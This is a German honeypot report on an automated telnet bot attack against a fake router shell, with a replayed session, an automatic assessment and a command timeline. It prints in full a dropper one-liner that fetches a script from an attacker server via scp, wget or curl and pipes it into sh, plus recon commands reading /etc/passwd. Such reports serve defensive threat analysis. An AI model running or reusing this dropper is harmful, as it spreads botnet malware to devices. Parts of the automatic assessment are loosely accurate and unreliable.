ALLSmartSecurity
Angriffsfall

Malware-Dropper: 7 Sitzungen von 7 IPs, Marker auth_ok

29.09.2026 · Malware-Dropper · 7 Anfragen · Dauer keine Angabe · Indonesien

Überblick

Klassifizierung
Malware-Dropper
Angriffsmuster
shell_session, Router-Escape, Dropper, Recon
Herkunft
Indonesien · PT Air Lintas Komunikasi

7 verschiedene Sitzungen (7 Durchläufe) von 7 IPs, Länder: ID (2), IN (1), US (1). Dienst: telnet/23. Immer dieselbe Kommandofolge, daher ein Bot bzw. eine Bot-Familie.

Erkannte Signaturen

Dekodierte Payloads

auth_ok

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
admin@srv01: ~

admin@srv01:~$ id
admin@srv01:~$ cat /etc/passwd
admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"
uid=1000(admin) gid=1000(admin) groups=1000(admin),27(sudo)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List
admin@srv01:~$ enable
admin@srv01:~$ system
admin@srv01:~$ shell
admin@srv01:~$ sh
admin@srv01:~$ bash
admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
admin@srv01:~$ [Token]
admin@srv01:~$ [Token]
admin@srv01:~$ [Token]
admin@srv01:~$ [Token]
admin@srv01:~$ [Token]
admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x
bash: enable: no such builtin function
bash: system: command not found
bash: shell: command not found
sh: 0: Illegal option -
bash: cd: /dev/shm: No such file or directory
bash: key.ppk: Permission denied
bash: sshcfg: Permission denied
bash: chmod: Permission denied
bash: scp: command not found
bash: wget: command not found
bash: curl: command not found
bash: rm: Permission denied
redbot_telnet_ok

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer nutzte Standardzugangsdaten, um sich als Administrator auf einem Router anzumelden. Nach der erfolgreichen Authentifizierung wechselte er in die Shell-Umgebung des Geräts. Dort erstellte er eine SSH-Schlüsseldatei und eine Konfigurationsdatei, um eine verschlüsselte Verbindung zu einem externen Server aufzubauen. Abschließend versuchte er, ein Skript herunterzuladen und auszuführen, das eine Telnet-Verbindung initiieren soll.

Was die Befehle bewirken

Die Befehle id und cat /etc/passwd dienen der Systemerkennung und der Prüfung der Benutzerrechte. Die enable, system und shell Befehle sind typisch für Cisco-Router, um in die privilegierte Shell zu gelangen. Der echo-Befehl schreibt einen Base64-kodierten SSH-Privatschlüssel in eine Datei namens key.ppk. Die Datei sshcfg deaktiviert die Host-Key-Prüfung, um Man-in-the-Middle-Angriffe zu umgehen. Der scp-Befehl lädt dann das Skript out_sh vom Angreiferserver herunter und führt es mit chmod +x aus.

Worauf es hinauslief

Das Ziel ist die Installation eines Botnet-Agents oder eines Kryptominers auf dem Router. Dies erkennt man an dem Versuch, einen externen Code über SCP zu laden und auszuführen. Der Marker auth_ok bestätigt, dass die Schwachstelle durch schwache Passwörter ausgenutzt wurde.

Einordnung

Dies ist ein sehr verbreiteter automatisierter Angriff, der gezielt Router mit Standardpasswörtern ins Visier nimmt. Die Nutzung von SCP statt HTTP ist eine etwas raffiniertere Methode, um Traffic zu verschleiern.

Ablauf

(12 von 7, Wiederholungen zusammengefasst)
ZeitMethodePfad / PayloadMuster
+0 sCMDid
+0 sCMDcat /etc/passwd
+0 sCMDecho -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"
+0 sCMDenable
+0 sCMDsystem
+0 sCMDshell
+0 sCMDsh
+0 sCMDbash
+0 sCMDcd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
+0 sCMD[Token]
+0 sCMD-----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
+0 sCMDUserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s t